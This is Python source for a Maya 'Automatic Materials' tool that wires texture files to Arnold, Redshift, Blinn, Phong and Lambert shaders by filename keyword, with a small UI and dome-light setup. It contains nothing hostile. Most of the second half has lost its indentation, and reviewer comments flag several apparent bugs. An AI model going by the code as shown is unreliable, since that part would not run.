    if cmds.ls(selection = True, type = 'file'): #If a texture file is selected
        #Arnold
        if cmds.ls(selection = True, type = 'aiStandardSurface'):#If arnold is selected
            global selected_shader
            selected_shader = cmds.ls(selection = True, type = 'aiStandardSurface')[0]
            # Arnold slot attributes, indexed 0-7: color, roughness, metalness,
            # normal, subsurface, emission, IOR, opacity.
            my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
            '.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
            # Snapshot any existing incoming connections per slot into globals.
            global connected_1
            connected_1 = cmds.listConnections(selected_shader + my_array[0])
            global connected_2
            connected_2 = cmds.listConnections(selected_shader + my_array[1])
            global connected_3
            connected_3 = cmds.listConnections(selected_shader + my_array[2])
            global connected_4
            connected_4 = cmds.listConnections(selected_shader + my_array[3])
            global connected_5
            connected_5 = cmds.listConnections(selected_shader + my_array[4])
            global connected_6
            connected_6 = cmds.listConnections(selected_shader + my_array[5])
            global connected_7
            connected_7 = cmds.listConnections(selected_shader + my_array[6])
            global connected_8
            connected_8 = cmds.listConnections(selected_shader + my_array[7])
            names = cmds.ls(selection = True, type = 'file')
            global i
            # Route each selected texture by filename keyword match.
            for i in names:
                if color_text in i or color_alt_text in i:
                    color_func('.baseColor')
                if roughness_text in i or roughness_alt_text in i:
                    roughness_func()
                if metal_text in i or metal_alt_text in i:
                    metal_func('.metalness')
                if normal_text in i:
                    normal_func()
                if scatter_text in i:
                    scatter_func('.subsurface')
                if emissive_text in i:
                    emissive_func('.emissionColor')
                if ior_text in i or 'Ior' in i or 'IOR' in i:
                    ior_func('.specularIOR')
                if opacity_text in i or 'opacity' in i:
                    opacity_func('.opacity')
        #Blinn
        elif cmds.ls(selection = True, type = 'blinn'):
            global selected_shader
            selected_shader = cmds.ls(selection = True, type = 'blinn')[0]
            my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
            '.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
            # Remap Arnold-style slot names to blinn's attribute names.
            my_array[0] = '.color'
            my_array[2] = '.reflectivity'
            my_array[7] = '.transparency'
            global connected_1
            connected_1 = cmds.listConnections(selected_shader + my_array[0])
            global connected_3
            connected_3 = cmds.listConnections(selected_shader + my_array[2])
            global connected_4
            connected_4 = cmds.listConnections(selected_shader + my_array[3])
            global connected_8
            connected_8 = cmds.listConnections(selected_shader + my_array[7])
            names = cmds.ls(selection = True, type = 'file')
            global i
            # Blinn only supports color / reflectivity / normal / transparency here.
            for i in names:
                if color_text in i or color_alt_text in i:
                    color_func()
                if metal_text in i or metal_alt_text in i:
                    metal_func()
                if normal_text in i:
                    normal_func()
                if opacity_text in i or 'opacity' in i:
                    opacity_func()
        #Phong
        elif cmds.ls(selection = True, type = 'phong'):
            global selected_shader
            selected_shader = cmds.ls(selection = True, type = 'phong')[0]
            my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
            '.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
            # Phong uses the same remap as blinn.
            my_array[0] = '.color'
            my_array[2] = '.reflectivity'
            my_array[7] = '.transparency'
            global connected_1
            connected_1 = cmds.listConnections(selected_shader + my_array[0])
            global connected_3
            connected_3 = cmds.listConnections(selected_shader + my_array[2])
            global connected_4
            connected_4 = cmds.listConnections(selected_shader + my_array[3])
            global connected_8
            connected_8 = cmds.listConnections(selected_shader + my_array[7])
            names = cmds.ls(selection = True, type = 'file')
            global i
            for i in names:
                if color_text in i or color_alt_text in i:
                    color_func()
                if metal_text in i or metal_alt_text in i:
                    metal_func()
                if normal_text in i:
                    normal_func()
                if opacity_text in i or 'opacity' in i:
                    opacity_func()
        #RedshiftMaterial
        elif cmds.ls(selection = True, type = 'RedshiftMaterial'):
            global selected_shader
            selected_shader = cmds.ls(selection = True, type = 'RedshiftMaterial')[0]
            # Redshift slot attributes in the same 0-7 slot order as Arnold.
            my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
            '.ms_amount', '.emission_color', '.refl_ior', '.opacity_color']
            global connected_1
            connected_1 = cmds.listConnections(selected_shader + my_array[0])
            global connected_2
            connected_2 = cmds.listConnections(selected_shader + my_array[1])
            global connected_3
            connected_3 = cmds.listConnections(selected_shader + my_array[2])
            global connected_4
            connected_4 = cmds.listConnections(selected_shader + my_array[3])
            global connected_5
            connected_5 = cmds.listConnections(selected_shader + my_array[4])
            global connected_6
            connected_6 = cmds.listConnections(selected_shader + my_array[5])
            global connected_7
            connected_7 = cmds.listConnections(selected_shader + my_array[6])
            global connected_8
            connected_8 = cmds.listConnections(selected_shader + my_array[7])
            names = cmds.ls(selection = True, type = 'file')
            global i
            for i in names:
                if color_text in i or color_alt_text in i:
                    color_func('.diffuse_color')
                if roughness_text in i or roughness_alt_text in i:
                    roughness_func('.refl_roughness')
                if metal_text in i or metal_alt_text in i:
                    metal_func('.refl_metalness')
                if normal_text in i:
                    rs_normal_func()
                if scatter_text in i:
                    scatter_func('.ms_amount')
                if emissive_text in i:
                    emissive_func('.emission_color')
                if ior_text in i or 'Ior' in i or 'IOR' in i:
                    ior_func('.refl_ior')
                if opacity_text in i or 'opacity' in i:
                    opacity_func('.opacity_color')
        #lambert
        elif cmds.ls(selection = True, type = 'lambert'):
            global selected_shader
            selected_shader = cmds.ls(selection = True, type = 'lambert')[0]
            my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
            '.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
            # Lambert has no specular channel: only color / normal / transparency.
            my_array[0] = '.color'
            my_array[7] = '.transparency'
            global connected_1
            connected_1 = cmds.listConnections(selected_shader + my_array[0])
            global connected_4
            connected_4 = cmds.listConnections(selected_shader + my_array[3])
            global connected_8
            connected_8 = cmds.listConnections(selected_shader + my_array[7])
            names = cmds.ls(selection = True, type = 'file')
            global i
            for i in names:
                if color_text in i or color_alt_text in i:
                    color_func()
                if normal_text in i:
                    normal_func()
                if opacity_text in i or 'opacity' in i:
                    opacity_func()
def Delete_shaders():
    """Delete every shading node the tool may have created.

    Sweeps the scene by node type, in order: all shading dependency nodes,
    all shading engines, then each extra node type listed in the
    module-level ``all_nodes_list``.
    """
    type_sweep = ['shadingDependNode', 'shadingEngine'] + list(all_nodes_list)
    for node_type in type_sweep:
        nodes = cmds.ls(type = node_type)
        # cmds.delete raises when handed an empty list, so only call it
        # when ls actually found matching nodes.
        if nodes:
            cmds.delete(nodes)
def normal_flip():
    """Invert the green-channel flip (``flipY``) on every Redshift normal map.

    Only acts when the active shader type is Redshift; toggles the boolean
    ``flipY`` attribute on each RedshiftNormalMap node in the scene.
    """
    if default_shader == redshift:
        for normal_node in cmds.ls( type = 'RedshiftNormalMap'):
            flip_attr = '{0}.flipY'.format(normal_node)
            # Single toggle replaces the original `== False` if/else branch;
            # setAttr coerces the bool to the same 0/1 the original wrote.
            cmds.setAttr(flip_attr, not cmds.getAttr(flip_attr))
def light_func():
    """Create an HDRI dome light for the active renderer and load ``default_pano``.

    Redshift dome lights read the HDR path directly from their ``tex0``
    attribute; Arnold skydomes need an explicit place2dTexture + file
    texture network wired into their ``color`` input.
    """
    if default_shader == redshift:
        mel.eval('redshiftCreateDomeLight')
        dome_light = cmds.ls(type = 'RedshiftDomeLight')[0]
        cmds.setAttr('{0}.tex0'.format(dome_light), default_pano, type = 'string')
    elif default_shader == arnold:
        mel.eval('cmdSkydomeLight')
        dome_light = cmds.ls(type = 'aiSkyDomeLight')[0]
        uv_placement = cmds.shadingNode('place2dTexture', asUtility = True)
        hdr_file = cmds.shadingNode('file', isColorManaged = True, asTexture = True, name = dome_light)
        cmds.setAttr('{0}.fileTextureName'.format(hdr_file), default_pano, type = 'string')
        cmds.connectAttr('{0}.outUV'.format(uv_placement), '{0}.uvCoord'.format(hdr_file))
        cmds.connectAttr('{0}.outUvFilterSize'.format(uv_placement), '{0}.uvFilterSize'.format(hdr_file))
        # Standard place2dTexture -> file texture hookups.
        for attr_name in ('rotateUV','offset','noiseUV','vertexCameraOne','vertexUvThree','vertexUvTwo','vertexUvOne',
                          'repeatUV','wrapV','wrapU','stagger','mirrorU','mirrorV','rotateFrame','translateFrame','coverage'):
            cmds.connectAttr('{0}.{1}'.format(uv_placement, attr_name), '{0}.{1}'.format(hdr_file, attr_name))
        cmds.connectAttr('{0}.outColor'.format(hdr_file), '{0}.color'.format(dome_light))
# --- UI construction (module level) ---
seperator_size = 20  # NOTE(review): name is a typo for "separator_size"; module-level, kept as-is
but_wid = 60         # button width in pixels
but_hi = 30          # button height in pixels
# Rebuild the window from scratch so re-running the script does not stack duplicates.
if cmds.window('myWindow', exists = True):
    cmds.deleteUI('myWindow')
cmds.window('myWindow', title = 'Automatic Materials')
cmds.showWindow('myWindow')
third_layout = cmds.columnLayout()
cmds.separator(height= seperator_size/4)
cmds.text(label = 'Search set project or select a file folder?')
# Project is set?
# NOTE(review): all callbacks below are passed as command *strings*, so the
# named functions are resolved in Maya's global namespace at click time.
collection1 = cmds.radioCollection()
cmds.radioButton( label='Set Project', select = True, onCommand = 'project()')
cmds.radioButton( label='Select a File Directory', onCommand = 'filedirectory()')
#object matching?
cmds.separator(height= seperator_size)
cmds.text(label = 'Apply materials to matching object names')
collection2 = cmds.radioCollection()
cmds.radioButton( label='True', select = True, onCommand = 'obj_match()')
cmds.radioButton( label='False', onCommand = 'obj_no_match()')
#Material Suffix
sep = cmds.separator(height= seperator_size)
third_layout  # no-op bare expression; presumably meant to re-select the layout — TODO confirm
cmds.text(align = 'left', label = 'Material_Suf')
mat_but = cmds.textField('suffix', receiveFocusCommand = 'suffix_func()', width = 60)
cmds.separator(height = 20)
#Selected shader
cmds.text(label = 'Select a Shader')
#Shader List (one radio button per supported shader type)
sec_layout = cmds.rowColumnLayout(numberOfColumns = 5)
collection3 = cmds.radioCollection()
cmds.radioButton( label='redshift',select = True, onCommand = 'red()')
cmds.radioButton( label='arnold', onCommand = 'arn()')
cmds.radioButton( label='lambert', onCommand = 'lam()')
cmds.radioButton( label='phong', onCommand = 'pho()')
cmds.radioButton( label='blinn', onCommand = 'bli()')
# Five invisible separators pad the 5-column grid so the action buttons
# start on a fresh row.
cmds.separator(height= seperator_size, visible = False)
cmds.separator(height= seperator_size, visible = False)
cmds.separator(height= seperator_size, visible = False)
cmds.separator(height= seperator_size, visible = False)
cmds.separator(height= seperator_size, visible = False)
cmds.button(label = 'Run', width = but_wid, height = but_hi, command = 'Run_shader()')
cmds.button(label = 'Delete', width = but_wid, height = but_hi, command = 'Delete_shaders()')
cmds.button(label = 'Selected', width = but_wid, height = but_hi, command = 'Selected()')
cmds.button(label = 'Norm Flip', width = but_wid, height = but_hi, command = 'normal_flip()')
cmds.button(label = 'Light', width = but_wid, height = but_hi, command = 'light_func()')
#End of UI Stuff
# Non-UI ("run") path.  If the user has file (texture) nodes selected together
# with exactly one shader, wire each selected file node into the matching
# shader attribute, dispatching on the selected shader's node type.
# Keyword globals (color_text, roughness_text, ...) hold filename substrings
# such as 'BaseColor'/'Roughness' defined earlier in the file.
if ui == False:
if cmds.ls(selection = True, type = 'file'): #If a texture file is selected
#Arnold
if cmds.ls(selection = True, type = 'aiStandardSurface'):#If arnold is selected
selected_shader = cmds.ls(selection = True, type = 'aiStandardSurface')[0]
# Attribute slots in fixed order: color, roughness, metal, normal,
# scatter, emission, IOR, opacity.
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
# NOTE(review): connected_1..8 capture the current incoming connections of
# each slot — presumably read by the *_func helpers as globals; they are not
# used locally in this branch.  Confirm against the helper definitions.
connected_1 = cmds.listConnections(selected_shader + my_array[0])
#3 mfis
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
# Route each selected file node by keyword found in its name.
for i in names:
if color_text in i or color_alt_text in i:
color_func('.baseColor')
if roughness_text in i or roughness_alt_text in i:
# NOTE(review): called without a target attribute unlike the others —
# presumably roughness_func defaults to '.specularRoughness'; confirm.
roughness_func()
if metal_text in i or metal_alt_text in i:
metal_func('.metalness')
if normal_text in i:
normal_func()
if scatter_text in i:
scatter_func('.subsurface')
if emissive_text in i:
emissive_func('.emissionColor')
if ior_text in i or 'Ior' in i or 'IOR' in i:
# NOTE(review): targets '.specularIOR' although my_array[6] above is
# '.thinFilmIOR' — verify which IOR slot is intended.
ior_func('.specularIOR')
if opacity_text in i or 'opacity' in i:
opacity_func('.opacity')
#Blinn — same pattern, with Blinn attribute names patched into the slots.
elif cmds.ls(selection = True, type = 'blinn'):
selected_shader = cmds.ls(selection = True, type = 'blinn')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
for i in names:
if color_text in i or color_alt_text in i:
color_func()
if metal_text in i or metal_alt_text in i:
metal_func()
if normal_text in i:
normal_func()
if opacity_text in i or 'opacity' in i:
opacity_func()
#Phong — identical handling to Blinn.
elif cmds.ls(selection = True, type = 'phong'):
selected_shader = cmds.ls(selection = True, type = 'phong')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
for i in names:
if color_text in i or color_alt_text in i:
color_func()
if metal_text in i or metal_alt_text in i:
metal_func()
if normal_text in i:
normal_func()
if opacity_text in i or 'opacity' in i:
opacity_func()
#RedshiftMaterial — full slot set with Redshift attribute names.
elif cmds.ls(selection = True, type = 'RedshiftMaterial'):
selected_shader = cmds.ls(selection = True, type = 'RedshiftMaterial')[0]
my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
'.ms_amount', '.emission_color', '.refl_ior', '.opacity_color']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
for i in names:
if color_text in i or color_alt_text in i:
color_func('.diffuse_color')
if roughness_text in i or roughness_alt_text in i:
roughness_func('.refl_roughness')
if metal_text in i or metal_alt_text in i:
metal_func('.refl_metalness')
if normal_text in i:
# Redshift normals go through a dedicated bump/normal helper.
rs_normal_func()
if scatter_text in i:
scatter_func('.ms_amount')
if emissive_text in i:
emissive_func('.emission_color')
if ior_text in i or 'Ior' in i or 'IOR' in i:
ior_func('.refl_ior')
if opacity_text in i or 'opacity' in i:
opacity_func('.opacity_color')
#lambert — color/normal/opacity only (no specular slots on lambert).
elif cmds.ls(selection = True, type = 'lambert'):
selected_shader = cmds.ls(selection = True, type = 'lambert')[0]
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
names = cmds.ls(selection = True, type = 'file')
for i in names:
if color_text in i or color_alt_text in i:
color_func()
if normal_text in i:
normal_func()
if opacity_text in i or 'opacity' in i:
opacity_func()
else:
# Files were selected but no supported shader type was in the selection.
cmds.warning('Please select your file(s) and a shader.')
# No texture file selected: batch mode.  Resolve a base folder, scan it for
# sub-folders, then create one default shader + shading group to start from.
else:
if project_is_set == True:
# Use the current Maya project root plus the configured image sub-folder.
# NOTE(review): relies on workspace(rd=True) returning a trailing '/' so
# plain concatenation yields a valid path — confirm.
basePath = cmds.workspace(q = True, rd = True)
basePath = basePath + default_project_image_directory
if project_is_set == False:
# fileMode=2: directory picker.  [0] raises if the dialog is cancelled
# (fileDialog2 then returns None) — worth confirming with the author.
basePath = cmds.fileDialog2(fileMode=2, caption="Import Folder")[0]
directory = cmds.getFileList(folder = basePath)
dir_array = []
# NOTE(review): 'dir' shadows the Python builtin.
dir = ''
dir_path_array = []
dir_len_array = []
# Entries whose names contain none of the known image extensions are treated
# as sub-folders and their contents listed.  (Nested 'if not' chain acts as
# an AND of all the exclusions.)
for i in directory:
if not '.png' in i:
if not '.tx' in i:
if not '.tga' in i:
if not '.jpeg' in i:
if not '.jpg' in i:
if not '.tif' in i:
if not'.raw' in i:
dir = (basePath + '/' + i)
dir_path_array.append(dir)
dir2 = cmds.getFileList(folder = dir)
# NOTE(review): appends the same value as dir_path_array;
# only its length is used below.
dir_len_array.append(dir)
dir_array.append(dir2)
dir_length = len(dir_len_array)
dir_var = 0
# arrays_func(index) presumably flattens dir_array into dir_total used
# below — confirm against its definition earlier in the file.
while dir_var < dir_length:
arrays_func(dir_var)
dir_var = dir_var + 1
# Create the starting shader of the chosen type and its shading group.
selected_shader = cmds.shadingNode(default_shader, asShader = True)
shadingEngine = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader + '.outColor', shadingEngine + '.surfaceShader')
selected_shader2 = selected_shader
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
# Snapshot of all existing shaders per type, used later for name matching.
arnold_shaders = cmds.ls(type = 'aiStandardSurface')
blinn_shaders = cmds.ls(type = 'blinn')
phong_shaders = cmds.ls(type = 'phong')
lambert_shaders = cmds.ls(type = 'lambert')
redshift_shaders = cmds.ls(type = 'RedshiftMaterial')
#Directory 2
# For every image file gathered from the sub-folders (dir_total is presumably
# populated by arrays_func above — confirm), split the filename at its
# map-type suffix and create/fetch a shader for the base name.
# NOTE(review): 'cut' is set as a (head, sep, tail) partition and apparently
# consumed globally by shader_create_func() — confirm against its definition.
# NOTE(review): 'raw' here has no leading dot (unlike the '.raw' filter
# above), so any name merely containing 'raw' matches — likely a bug.
for i in dir_total:
if '.png' in i or '.jpg' in i or '.jpeg' in i or '.tga' in i or '.tif' in i or 'raw' in i:
if not '.swatch' in i:
if color_text in i:
cut = i.partition('_Base_' + color_text)
shader_create_func()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
shader_create_func()
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
shader_create_func()
if roughness_alt_text in i:
cut = i.partition('_' + roughness_alt_text)
shader_create_func()
if metal_text in i:
cut = i.partition('_' + metal_text)
shader_create_func()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
shader_create_func()
if normal_text in i:
cut = i.partition('_' + normal_text)
shader_create_func()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
shader_create_func()
if emissive_text in i:
cut = i.partition('_' + emissive_text)
shader_create_func()
if ior_text in i:
cut = i.partition('_' + ior_text)
shader_create_func()
if 'Ior' in i:
cut = i.partition('_Ior')
shader_create_func()
if 'IOR' in i:
cut = i.partition('_IOR')
shader_create_func()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
shader_create_func()
if 'opacity' in i:
cut = i.partition('_opacity')
shader_create_func()
# Dispatch on the created default shader's node type.  For each selected file
# node, find an existing shader of that type whose name contains the file's
# base name (cut[0]); otherwise create one (plus a shading group) and connect
# the texture via the *_func2 helpers, which read the connect_*/cut globals.
# NOTE(review): lines consisting solely of 'connect_N' below are no-op
# expression statements (they evaluate an already-bound list and discard it)
# — they look like leftovers; confirm nothing relies on them.
# NOTE(review): the substring match 'cut[0] in b' can hit several shaders;
# the last match wins selected_shader2.
if cmds.nodeType(selected_shader) == 'aiStandardSurface':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == arnold:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.baseColor')
if same_name == False:
# No existing shader matched: build a new one named after the
# texture base name plus the configured material suffix.
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2()
if same_name == False:
roughness_func2()
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2()
if same_name == False:
roughness_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
# NOTE(review): references connect_3 (metal slot) where the
# parallel branches use the slot-matching connect_4 — harmless
# since the statement is a no-op, but looks like a paste slip.
connect_3
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
scatter_func2('.subsurface')
if same_name == False:
scatter_func2('.subsurface')
if emissive_text in i:
cut = i.partition('_' + emissive_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
emissive_func2('.emissionColor')
if same_name == False:
emissive_func2('.emissionColor')
if ior_text in i:
cut = i.partition('_' + ior_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if 'Ior' in i:
cut = i.partition('_Ior')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if 'IOR' in i:
cut = i.partition('_IOR')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
#Blinn — same find-or-create pattern with Blinn slot names.
elif cmds.nodeType(selected_shader) == 'blinn':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == blinn:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#Phong — identical to the Blinn branch with phong shaders.
elif cmds.nodeType(selected_shader) == 'phong':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
